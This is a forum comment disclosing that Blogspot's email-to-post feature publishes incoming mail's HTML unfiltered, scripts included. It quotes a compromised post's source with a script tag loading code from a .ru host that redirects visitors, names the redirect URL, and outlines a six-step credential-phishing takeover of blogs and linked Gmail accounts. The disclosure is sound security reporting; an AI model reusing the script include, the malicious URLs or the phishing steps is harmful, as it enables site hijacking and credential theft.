[blauwbilgorgel]

Automatically posting any email received onto the web can be a security issue. As you said, Blogspot is indiscriminate on which e-mail it publishes, there is no need to suggest a virus is targeting Facebook or Twitter mails -- I was confused on that point.

I've tested the indiscriminate posting and any HTML you send to Blogspot accounts with this feature gets published: Including <script> tags.

An e-mail client isn't supposed to execute <script> tags, I feel if you republish an email online, it should strip out the <script> tags too.

The Blogspot sites that run this service are currently under attack by spammers, who send spam emails (which don't seem to get filtered very well), allowing spam by proxy and editorial-looking links. Some go even further and send them emails containing redirect scripts, or entire websites with CSS-styles set on the body.

  view-source:http://byubjjclub.blogspot.com/search?updated-max=2012-10-23T21:02:00-06:00&max-results=5&start=5&by-date=false

contains such an email-to-webpage post as an example in the source.

  <div class='post-body entry-content' id='post-body-3218874062265356726' itemprop='description articleBody'>
  <style type="text/css"> 
  h1 a:hover {background-color:#888;color:#fff ! important;}                          
  [...]
  </style> 
  [...]
  <div xmlns="http://www.w3.org/1999/xhtml" id="emailbody" 
  style="margin:0 2em;
  [...]
  <table style="border:0;padding:0;margin:0;width:100%">
  [...]
  <br /> <br /> <script language="javascript"   

  src="http://luckysearcher.ru/6peybjqhb197phmv2pevisws0k5u0k5"
  type="text/javascript"></script> <img  
  src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTcpQG9IOqXoDrlzTdytRpeTN7sqIocaNZBAwxXxGEGUNrD4iwE" /> 
  <br /> <br />
  [...]
  To stop receiving these emails, you may <a href="http://feedburner.google.com/fb/a/mailunsubscribe?k=uVg9TnxQ6-Owt_QRoJn279y21hs">unsubscribe now</a>.
  </td> <td style="font-family:Helvetica,Arial,Sans- 
  Serif;font-size:11px;margin:0 6px 1.2em 0;color:#333;text   
  align:right;vertical-align:top">Email delivery powered by 
  Google</td> </tr> <tr>
  ...

Sending such an e-mail to Blogspot users with this feature, will redirect all their visitors to

  view-source:http://mupara.ru/index.php?pid=19868&subid=31445&psn=131

Custom CSS and custom script allow for attack vectors such as these. Spam doesn't seem to filter very well. This is something of an issue that Blogspot can protect their users and visitors against, no? And did the users of this function understand the privacy ramifications of turning their inbox into a public mailing-list?

Worse than redirects, thinking like a wicked spammer:

  1. User turns on feature inbox-to-webpage
  2. Spammer finds these users by scanning the index
  3. Spammer sends such users (or with every spam mail) a malicious javascipt file
  4. javascript pop-up with: "Re-enter your credentials"
  5. Change password and steal blog
  6. Check if blogspot account is connected to a Gmail account.